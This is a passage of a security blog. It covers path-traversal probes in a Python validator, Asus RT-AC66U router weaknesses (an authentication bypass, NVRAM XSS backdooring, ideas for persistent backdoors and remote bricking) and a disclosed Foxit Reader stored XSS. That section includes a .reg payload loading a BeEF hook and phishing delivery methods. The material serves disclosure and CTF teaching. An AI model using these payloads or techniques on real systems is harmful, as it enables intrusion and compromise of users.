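    normalised result, never on the raw string.
    """
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None          # still changing after the last round: nested encoding
    if "\x00" in path:
        return None          # a NUL would truncate the path in C string handling
    path = path.replace("\\", "/")
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:
                return None  # attempt to escape the document root
            stack.pop()
            continue
        stack.append(segment)
    return "/" + "/".join(stack)


def resolve_under_root(raw_path, web_root="/www"):
    """Map a request to a filesystem path under web_root, or None if rejected."""
    canonical = canonical_request_path(raw_path)
    if canonical is None:
        return None
    return web_root.rstrip("/") + canonical


# Constructed probe set: (request path, is it a legitimate request?)
PROBES = [
    ("/index.asp", True),
    ("/images/../index.asp", True),
    ("/../etc/passwd", False),
    ("/%2e%2e/%2e%2e/etc/passwd", False),
    ("/%252e%252e/etc/passwd", False),
    ("/images/..\\..\\etc/passwd", False),
    ("/index.asp%00.jpg", False),
    ("/%2525252e%2525252e/etc/passwd", False),
]


def evaluate(probes=PROBES):
    """Compare both checks over the probe set.

    Returns (naive_misses, hardened_correct): the attack probes the substring
    test lets through, and whether the canonicalising check classifies every
    probe as expected.
    """
    naive_misses = [p for p, ok in probes if not ok and not naive_rejects(p)]
    hardened_correct = all(
        (resolve_under_root(p) is not None) == ok for p, ok in probes
    )
    return naive_misses, hardened_correct


if __name__ == "__main__":
    misses, correct = evaluate()
    print("substring check misses:", misses)
    print("canonicalising check correct on all probes:", correct)
```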
The web server has some mime handler exceptions that were "supposed to be removed":<br />
<br />
<script src="https://gist.github.com/bmaia/08e9d6f8dffa84d8bf81.js"></script>
get_webdavInfo.asp is accessible without authentication and displays lots of sensitive information from the device and the network:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFirRag55xYCyzTqaEhrfb-GkikBJkIOP0fHoAK2RKbm-lx8DEPDmpx-OznCS39u18oTN6f-2Ghr49k19yUdsWXbuy4nh6vHCnsZphtjlWFMu_Xr2jCbd8fuyORSEFwL8ivJQ4YSTky7A/s1600/printe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFirRag55xYCyzTqaEhrfb-GkikBJkIOP0fHoAK2RKbm-lx8DEPDmpx-OznCS39u18oTN6f-2Ghr49k19yUdsWXbuy4nh6vHCnsZphtjlWFMu_Xr2jCbd8fuyORSEFwL8ivJQ4YSTky7A/s1600/printe.PNG" height="116" width="400" /></a></div>
<br />
We can modify the nvram variables used to display this page and backdoor the router with an XSS payload, for example.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnA_WvBSZj1ItQeUQ0kcQkJNipK4EyeoMfaT9lUl7FOzyd6dxw9W9vpO1A0XHbXi5k45thEbYLJ3TI7bV7ul-H__wnWz2_WcH7tHEVXVdXJpE7cO9GSgDy2Dfp5U3VWjkTOc21AFJupNHK/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnA_WvBSZj1ItQeUQ0kcQkJNipK4EyeoMfaT9lUl7FOzyd6dxw9W9vpO1A0XHbXi5k45thEbYLJ3TI7bV7ul-H__wnWz2_WcH7tHEVXVdXJpE7cO9GSgDy2Dfp5U3VWjkTOc21AFJupNHK/s1600/xss.PNG" height="231" width="400" /></a></div>
<br />
Some sensitive operations use the <i>nvram_get</i> and <i>nvram_safe_get</i> functions. Some settings are stored using the <i>nvram_set</i> function. If the router does not sanitize the data being stored in and retrieved from the NVRAM, you may be able to perform some kind of NVRAM injection (remember, %00, %0A, %0D and `reboot` are always there for you).<br />
<br />
AiCloud is a *very* vulnerable service that can be <a href="http://www.securityfocus.com/archive/1/526942">easily exploited</a> too. When you activate the service, the router starts a lighttpd daemon on port 8082 (or 443 on newer firmwares) and offers the option to share your files online. The only caveat is that the username and password screen can be bypassed by visiting the /smb/ URL (read the source, Luke):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDwFnAjWddSNUNzEBj_u0bQIVUKUK2z32BCl4Aybn_J0UePln7DoMQd-yuRb3PwhlU7ea7YEOFV6sLvP-IRdrZyeeoMDE8e8-ohNILfConHhVXCZCfJY81jwZWOGoB7Wj1BNJlYsg1tFf/s1600/ai1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDwFnAjWddSNUNzEBj_u0bQIVUKUK2z32BCl4Aybn_J0UePln7DoMQd-yuRb3PwhlU7ea7YEOFV6sLvP-IRdrZyeeoMDE8e8-ohNILfConHhVXCZCfJY81jwZWOGoB7Wj1BNJlYsg1tFf/s1600/ai1.PNG" height="300" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3Q3m0RlTPoB5EOO9cLUfxjpoFA8D5-6SnUzy7wjXLgJsoRQs4QsXBrKe7L-KDbK3LU8xM5LjJ8h8v72DeLYdCKkNwMAV2S82wDrmoZbOHD2gJooKKejA3ATihGj0obM3C8eNCGwTacEg/s1600/ai2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3Q3m0RlTPoB5EOO9cLUfxjpoFA8D5-6SnUzy7wjXLgJsoRQs4QsXBrKe7L-KDbK3LU8xM5LjJ8h8v72DeLYdCKkNwMAV2S82wDrmoZbOHD2gJooKKejA3ATihGj0obM3C8eNCGwTacEg/s1600/ai2.PNG" height="295" width="400" /></a></div>
<br />
I wrote a simple AiCloud crawler that exploits this bug on RT-AC66U v3.0.0.4.266. It lists all the files/paths from the router (including the attached USB devices).<br />
<br />
<script src="https://gist.github.com/bmaia/9a811b1e9f58e31814d5.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht0r6xgp699drClb6EX5ZMosBjYLNgvfe4u108STdNsQ3kx2iYPHLhRs3Zm3nNYDjEvex8ooQ0alJlLYn3jqalfWEOGBGHKCpF1vQRaDZ8MTyx8uaW_qI6sDmKG6mxi6AHHQLn36kdeeRs/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht0r6xgp699drClb6EX5ZMosBjYLNgvfe4u108STdNsQ3kx2iYPHLhRs3Zm3nNYDjEvex8ooQ0alJlLYn3jqalfWEOGBGHKCpF1vQRaDZ8MTyx8uaW_qI6sDmKG6mxi6AHHQLn36kdeeRs/s1600/x1.png" height="262" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD91rF6f73IH1fBtqUOuGrJUhHK1EST4xdeoU6Pm9WK2voxALJRIM1SRNpA9T2Poe3PZq6SbumDXuDseJbnN-7IOlg5wVzy7u7N429Jy75e1fXSUH6EX6tX9GGkLf0ANoWuoTry3y_jqwc/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD91rF6f73IH1fBtqUOuGrJUhHK1EST4xdeoU6Pm9WK2voxALJRIM1SRNpA9T2Poe3PZq6SbumDXuDseJbnN-7IOlg5wVzy7u7N429Jy75e1fXSUH6EX6tX9GGkLf0ANoWuoTry3y_jqwc/s1600/x2.png" height="97" width="400" /></a></div>
<br />
Last, but not least, don't forget to compare the differences between the files in the <i>www</i> directory. This path stores all the web components and scripts used by the web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5i1Aj-SLOJuOY3Aj88vTCJjx_XNDsg_U1zNEULDLIEqzE8pyXiiG_x50I1KAyiFgL6Jb-RvfZw2iOQEajuRbK1RiW1xeOLPz8efFRkCaf16-1UM_6cc8ub9dXZ4VGjaUxAnv1V2wINhW/s1600/www.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5i1Aj-SLOJuOY3Aj88vTCJjx_XNDsg_U1zNEULDLIEqzE8pyXiiG_x50I1KAyiFgL6Jb-RvfZw2iOQEajuRbK1RiW1xeOLPz8efFRkCaf16-1UM_6cc8ub9dXZ4VGjaUxAnv1V2wINhW/s1600/www.png" height="227" width="400" /></a></div>
<b><br /></b>
<b>bonus</b><br />
<b><br /></b>
Why not try to open the hardware case without voiding the warranty seal? You may need some tips from the guys at the <a href="http://defcne.net/villages/22/17">DEFCON Tamper Evident Village</a>.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Wn_1QRVd-1bm3hzzvtZqZgdn3Mc_b2VdN8Hf8S1_UcjWQeiCjcmIJ2eCpWXG7x738qoONV6GAbMVGPRMzyoTP5gsqlHLArMSdpwK8_nGyKie-Edg2KzTVFkN1h6rRNM4QLLRobxnBuN7/s1600/tamper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Wn_1QRVd-1bm3hzzvtZqZgdn3Mc_b2VdN8Hf8S1_UcjWQeiCjcmIJ2eCpWXG7x738qoONV6GAbMVGPRMzyoTP5gsqlHLArMSdpwK8_nGyKie-Edg2KzTVFkN1h6rRNM4QLLRobxnBuN7/s1600/tamper.png" height="400" width="348" /></a></div>
<br />
<br />
<b>misc (a.k.a. Conclusion)</b><br />
<br />
Hacking the Asus RT-AC66U is a very good exercise for newcomers to router hacking. Most of its source code is available online and we can easily find lots of exploits and advisories for it. You may not have noticed, but we tested every single aspect of the <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Top_Ten_Project#tab=OWASP_Internet_of_Things_Top_10_for_2014">OWASP Internet of Things Top 10</a>. Recent rumors indicate that this router is going to be used as the base for the OWASP IoT Webgoat and the Damn Vulnerable Embedded Linux.<br />
<br />
Some additional approaches you should be taking and that should be awarded extra points during the contest:<br />
<br />
<ul>
<li>Rewrite the bootloader to create a backdoored dual-boot partition</li>
<li>Backdoor the device in a way that firmware upgrades won't affect it</li>
<li>Brick the device remotely</li>
<li>Reprogram the LED to create a PONG game</li>
</ul>
<br />
There are many things that I still want to write about, but I'm saving that for future posts. If you are going to participate in the <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken CTF</a> and find this guide useful, feel free to ping me and let's get a coffee together during DEFCON/BsidesLV/Blackhat =)<br />
<br />Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br />
<br />
<b>Foxit PDF Reader Stored XSS</b> (published 2014-07-07, updated 2014-07-16)<br />
<br />
A friend of mine was performing an external pentest recently and he started to complain that his traditional Java exploits were not being effective. He was able to map a few applications and defenses in place protecting the client's network, but he still needed initial access to start pivoting.<br />
<br />
Basic protections like AV and application whitelisting, as well as more advanced ones like EMET, are used to make the life of criminals (and pentesters) harder, but they're often bypassed. While discussing alternatives with my friend, he told me that the company had replaced Adobe Reader after seeing lots of security advisories for the product. And what was the replacement? Foxit Reader:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5WwaxcMQmAz7LXN6ZnpjhPynApNziXCmWpm3GGgZKRVKso3sNTbfuDdmFibKc2rTvqzNXesKtZgInW58LJoMgVTSysAH2d1fvkstDnGl_6UVN3Dw_RK2wGnP1ZNpJLymw7i-tP3iPviK2/s1600/chart.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5WwaxcMQmAz7LXN6ZnpjhPynApNziXCmWpm3GGgZKRVKso3sNTbfuDdmFibKc2rTvqzNXesKtZgInW58LJoMgVTSysAH2d1fvkstDnGl_6UVN3Dw_RK2wGnP1ZNpJLymw7i-tP3iPviK2/s1600/chart.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Advisories for Adobe Reader and Foxit Reader listed on <a href="http://www.osvdb.com/">OSVDB</a> (May/2014)</td></tr>
</tbody></table>
Fewer advisories means that the product is more secure, right? <a href="https://twitter.com/mruef">Marc Ruef</a>'s talk about <a href="http://www.scip.ch/publikationen/praesentationen/scip_area41-2014_vuldb.pdf">VDB management</a> summarizes this point:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXECd3LsOS4yECWPXLioH13ecmdq7ghM5dy3o3QlxRfG3rjHMDKTToZFfV_PILx8zIuJI_64w6MtB3VSnN-30RT-pX4rkhMmgPUO2F_1I23zt9mQ9cJNN1rZEuKZ8_51tMfq66nw9K4GU/s1600/talk.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXECd3LsOS4yECWPXLioH13ecmdq7ghM5dy3o3QlxRfG3rjHMDKTToZFfV_PILx8zIuJI_64w6MtB3VSnN-30RT-pX4rkhMmgPUO2F_1I23zt9mQ9cJNN1rZEuKZ8_51tMfq66nw9K4GU/s1600/talk.PNG" height="368" width="640" /></a></div>
<br />
The moment I heard the words Foxit Reader I remembered an old exploit I created a long time ago. The vulnerability wasn't that critical, but I knew that it would fit the situation (and this blog post).<br />
<div style="text-align: left;">
<br /></div>
As I was about to disclose it publicly, I notified the vendor and waited for them to patch it. I had some problems with their security contact and had to mail them twice, but they answered after a couple of days, patching the product and releasing an advisory (no CVE is assigned for this vulnerability at the time of writing).<br />
<br />
<b>Security Advisory</b><br />
<b><br /></b>
<a href="http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21">http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21</a><br />
<br />
<b>Fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page.</b><br />
<br />
<b>Summary</b><br />
<b><br /></b>
Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, and Foxit PhantomPDF 6.2.1 fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page. Attackers could tamper with the registry entry and cause the application to load malicious files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3WgRDpfVg4jJ-iWnxecsozykNNttgxR8Poy5FFJtTS1st8pjD4c_RrzdufCnvhvwrj78g5B2TH6K8m-2yF2LUhOyVjVGwlve-7GzoyotYw-X0X8lj40JEYgOyZi1mkQFzCfig7evDs0p/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3WgRDpfVg4jJ-iWnxecsozykNNttgxR8Poy5FFJtTS1st8pjD4c_RrzdufCnvhvwrj78g5B2TH6K8m-2yF2LUhOyVjVGwlve-7GzoyotYw-X0X8lj40JEYgOyZi1mkQFzCfig7evDs0p/s1600/1.PNG" height="307" width="400" /></a></div>
<br />
When opening a PDF, Foxit creates a "FileX" registry entry with the document's complete path:<br />
<div>
<div>
<br /></div>
<div>
[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]</div>
<div>
"File1"="C:\\w00t.pdf"</div>
<div>
<br /></div>
<div>
Whenever you open a document, Foxit 6.x displays the start panel on a different tab by default. All you need to do is edit the registry and place your XSS payload (or the <a href="http://beefproject.com/">BeEF</a> hook) in the FileX entry:</div>
<br />
<div class="code">
C:\Users\Admin\Desktop>type reg.reg<br />
<br />
Windows Registry Editor Version 5.00<br />
<br />
[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]<br />
"File1"="C:\\w00t.pdf<script src=\"http://BEEF/hook.js\"></script>"<br />
<br />
C:\Users\Admin\Desktop>reg import reg.reg<br />
The operation completed successfully.</div>
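The root cause, shown here as an added example rather than Foxit's own code: the start page interpolates the Recent File List value into its HTML without escaping, so whatever the registry holds is parsed as markup. The Python below renders a constructed copy of the value from the reg file above both ways; the function names are chosen for this example and the "BEEF" host is the post's placeholder, not a real server.<br />

```python
# Added example (not Foxit's code): a registry value rendered into an HTML
# start page without escaping becomes stored XSS; html.escape() is the fix.
import html

# Constructed sample matching the reg file above; "BEEF" is the post's
# placeholder host, not a real server.
RECENT_FILES = {
    "File1": 'C:\\w00t.pdf<script src="http://BEEF/hook.js"></script>',
    "File2": "C:\\Users\\Admin\\Documents\\report.pdf",
}


def render_recent_files_vulnerable(entries):
    """Builds the list by string concatenation: the registry value lands in
    the page verbatim, so the <script> element in File1 is parsed and run."""
    items = "".join(f"<li>{name}: {path}</li>" for name, path in entries.items())
    return f"<ul>{items}</ul>"


def render_recent_files_hardened(entries):
    """Same list, but every untrusted value is HTML-escaped at the point of
    interpolation, so the path is displayed as text and never as markup."""
    items = "".join(
        f"<li>{html.escape(name)}: {html.escape(path)}</li>"
        for name, path in entries.items()
    )
    return f"<ul>{items}</ul>"


if __name__ == "__main__":
    print(render_recent_files_vulnerable(RECENT_FILES))
    print(render_recent_files_hardened(RECENT_FILES))
```

The escaping has to happen where the value meets the HTML, not when it is read from the registry, since the same value may legitimately be shown in a tooltip, a window title or a log where HTML entities would be wrong.<br />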
<div>
<br /></div>
<div>
Now wait for the victim to open any PDF File (using Foxit Reader):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CF_PxmB3_SrAGmoLMFi-MrIdXJMxwIrj60hE-NSHh2dpJE-i1YysHi3SVbkDqhnh1oi-N7z2M-Oox5qEY33m0fbK9LFtPzMD0MLhzIqQaPUEs6fRnzRmoaZgIjecZTs5VIugIUB9iNZ1/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CF_PxmB3_SrAGmoLMFi-MrIdXJMxwIrj60hE-NSHh2dpJE-i1YysHi3SVbkDqhnh1oi-N7z2M-Oox5qEY33m0fbK9LFtPzMD0MLhzIqQaPUEs6fRnzRmoaZgIjecZTs5VIugIUB9iNZ1/s1600/2.PNG" height="227" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirgX4d3Cf-wip0HQc9MWQtfyn_9MbCL7qp4TuHgzmHmCax__4iOdz0BZ3ihWiMPOvIVM60Yfv2Q_NExStLXrVXva1yyPGkdqWLkFgFV2kIptXupjUH9nV7a4LISm7jLRgiqElQKvGezOU_/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirgX4d3Cf-wip0HQc9MWQtfyn_9MbCL7qp4TuHgzmHmCax__4iOdz0BZ3ihWiMPOvIVM60Yfv2Q_NExStLXrVXva1yyPGkdqWLkFgFV2kIptXupjUH9nV7a4LISm7jLRgiqElQKvGezOU_/s1600/3.PNG" height="306" width="400" /></a></div>
<b><br /></b>
<b>Affected Versions</b></div>
</div>
<br />
Foxit Reader 6.2.0.0429 and earlier<br />
Foxit Enterprise Reader 6.2.0.0429 and earlier<br />
Foxit PhantomPDF 6.2.0.0429 and earlier<br />
<br />
<b>Solution</b><br />
<br />
Upgrade to Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, or Foxit PhantomPDF 6.2.1.<br />
<br />
<b>Security Process</b><br />
<br />
2014-05-24: <a href="https://twitter.com/bernardomr">Bernardo Rodrigues</a> found the issue;<br />
2014-06-03: Core Security Technologies confirmed the issue;<br />
2014-06-11: Foxit fixed the issue;<br />
2014-07-01: Foxit released fixed version of Foxit Reader 6.2.1/Foxit Enterprise Reader 6.2.1/Foxit PhantomPDF 6.2.1.<br />
<div>
<br />
<b>Foxit Reader XSS + Phishing</b><br />
<b><br /></b>
I know, the bug does not seem to be that good and would have no use during a pentest engagement. When I first found this flaw, I could basically think of three ways to compromise the user's Foxit Reader installation:<br />
<br />
<b>1 - Sending a PDF with the XSS payload on the filename</b><br />
<br />
That would be the ideal solution, but I was unable to craft a file with the XSS payload and open it on a Windows system. Microsoft Windows won't create filenames with special chars like <, > and /, so I booted my Linux VM, created a file called <plaintext>.pdf and compressed it into test.zip.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Q96p2iI2bdulz7Tx7uh7gvs2ik4VQ525U6LzygGOO6V7xSU9By3dMsieXaUII5nYf3FEd5EI8qJQCccI6wzGx4z2t8VvRIl-FWhhjpQsPRY3DQ6m4Kkp29bPABAlxRNw9cK4ZWTJUYrX/s1600/x2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Q96p2iI2bdulz7Tx7uh7gvs2ik4VQ525U6LzygGOO6V7xSU9By3dMsieXaUII5nYf3FEd5EI8qJQCccI6wzGx4z2t8VvRIl-FWhhjpQsPRY3DQ6m4Kkp29bPABAlxRNw9cK4ZWTJUYrX/s1600/x2.PNG" height="228" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3ikUrTn04VNRW63DKyTIuz3jGjzLIs_zpbTG-jxsZnlgwPUp2ju8vjXzbq0y6ZiciuK_b6S7I1-lkITAfcRZUUG771GPoiI98yLJDLH8rV15FEB6FFph19oLq5ug7ND19qc0E0tYAan0R/s1600/x1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3ikUrTn04VNRW63DKyTIuz3jGjzLIs_zpbTG-jxsZnlgwPUp2ju8vjXzbq0y6ZiciuK_b6S7I1-lkITAfcRZUUG771GPoiI98yLJDLH8rV15FEB6FFph19oLq5ug7ND19qc0E0tYAan0R/s1600/x1.PNG" height="245" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Ky4ojm1cZorATOsbRUd6_2nO0VaZ6KdVnYVwITmBFwsAX03m32Ow8sGjmaoa4lwAjVFIkFgCTAMqXACcyV4WHVq73_JBplOZREBnoO8aQLEBIxobdNC4-mGQU35rism_1R7AwcxSpp6S/s1600/x3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Ky4ojm1cZorATOsbRUd6_2nO0VaZ6KdVnYVwITmBFwsAX03m32Ow8sGjmaoa4lwAjVFIkFgCTAMqXACcyV4WHVq73_JBplOZREBnoO8aQLEBIxobdNC4-mGQU35rism_1R7AwcxSpp6S/s1600/x3.PNG" height="182" width="400" /></a></div>
<br />
When double clicking the file on WinRAR, the OS won't open it. If we drag it to the Foxit Reader Window, the special chars are replaced and the XSS payload won't load.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMSylrpYpV1yobgq0wNxURHItAtpBmgdtKUpJ4K6Q8gHzEeQBC8saOwryx8RiZp45Pd9zJzVsZcEFhJOanw1EonG15pWAmdNZxQdoeTzDrMQelfiAiQee7AplpXc2gumKPL5HIBCQa9Si/s1600/x4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMSylrpYpV1yobgq0wNxURHItAtpBmgdtKUpJ4K6Q8gHzEeQBC8saOwryx8RiZp45Pd9zJzVsZcEFhJOanw1EonG15pWAmdNZxQdoeTzDrMQelfiAiQee7AplpXc2gumKPL5HIBCQa9Si/s1600/x4.PNG" height="140" width="320" /></a></div>
<br />
I tried alternative encodings and different XSS vectors, but I couldn't exploit it properly on Windows. If you have any better ideas, please <a href="https://twitter.com/bernardomr">let me know</a>.<br />
<br />
<b>2 - Send a .reg to the user and ask him to double click it</b><br />
<br />
Most people won't click on executable attachments in e-mails: that's why <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-cpl-malware/">Brazilian criminals distribute malware using CPL files</a>, for example. Some e-mail providers like Outlook block .reg attachments, but many other services like Gmail won't block them:<br />
<br />
Registry file blocked on Outlook:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUxXvNzyKB4iLtXGF8hshWaO0rzmcY0bJYbR0JRiKx-725RXrf2hpWcF4UnEeeJFuT5Ysp7_DpY5V-FuE1b5Thu0252lDGoRDoYp1tiE_kQ8b0qwz3d-quWY-C9Qfn0R8zI7aD5QbgI7fa/s1600/outlook.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUxXvNzyKB4iLtXGF8hshWaO0rzmcY0bJYbR0JRiKx-725RXrf2hpWcF4UnEeeJFuT5Ysp7_DpY5V-FuE1b5Thu0252lDGoRDoYp1tiE_kQ8b0qwz3d-quWY-C9Qfn0R8zI7aD5QbgI7fa/s1600/outlook.PNG" /></a></div>
Registry File attachment on Gmail:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPteuPjFYpaVJpW7mdnbeoZliGWonDWi8P5AI80N3UNzHVT1i9aXTMY4qJHQDj3ILZ7olEQ1XN5UKGVvqaLspwDRrI14OTofFnsPdkhZ9WYJQELfp_h03A6ABfwyEWKTqFPpKiqbQsD05t/s1600/gmail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPteuPjFYpaVJpW7mdnbeoZliGWonDWi8P5AI80N3UNzHVT1i9aXTMY4qJHQDj3ILZ7olEQ1XN5UKGVvqaLspwDRrI14OTofFnsPdkhZ9WYJQELfp_h03A6ABfwyEWKTqFPpKiqbQsD05t/s1600/gmail.PNG" height="182" width="320" /></a></div>
<br />
<b>3 - Embed the .reg object on a RTF or Word Document and instruct the user to run it</b><br />
<br />
There's a video for this one, featuring <a href="http://beefproject.com/">BeEF</a>, your favorite <strike>Browser</strike> PDF Reader Exploitation Framework Project =)<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="yes" frameborder="0" height="344" src="//www.youtube.com/embed/74OgNhCDGKo" width="459"></iframe><br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
The interesting part here is that the PDF Reader is not subject to the Same-Origin Policy, so the hook can be used as a reliable proxy to the internal network.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlFEqdleCLAmDCxc9ynCY6w43L-um7BXC3H2PLVdkYx9cZjSQ0GARGWa5-WHABAu1-87qN8i62_zv9njKHrmuGmkzJualGDs4mjRm6MWwdiJbxNLZBpQeXZFTYNFbOeElLdSxalEtCYcT/s1600/vid3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwlFEqdleCLAmDCxc9ynCY6w43L-um7BXC3H2PLVdkYx9cZjSQ0GARGWa5-WHABAu1-87qN8i62_zv9njKHrmuGmkzJualGDs4mjRm6MWwdiJbxNLZBpQeXZFTYNFbOeElLdSxalEtCYcT/s1600/vid3.PNG" height="176" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This is also one of the rare scenarios where you can run "localhost" exploits from BeEF, as long as the user accepts the prompted ActiveX warning:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz4pz5B4nKrARaG7BN_drFQhvolm_zisRDs7D3HFuQmIrQAQ5UCyQ8xYHWb0lNMQ2iMwUWChY-cSVWqbNvxIL_IdgMmVXTBN83HvLddZVmtxZu_pOVPX9VPYiPae8h_aouAOMug_wGWiKD/s1600/vid1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz4pz5B4nKrARaG7BN_drFQhvolm_zisRDs7D3HFuQmIrQAQ5UCyQ8xYHWb0lNMQ2iMwUWChY-cSVWqbNvxIL_IdgMmVXTBN83HvLddZVmtxZu_pOVPX9VPYiPae8h_aouAOMug_wGWiKD/s1600/vid1.PNG" height="154" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
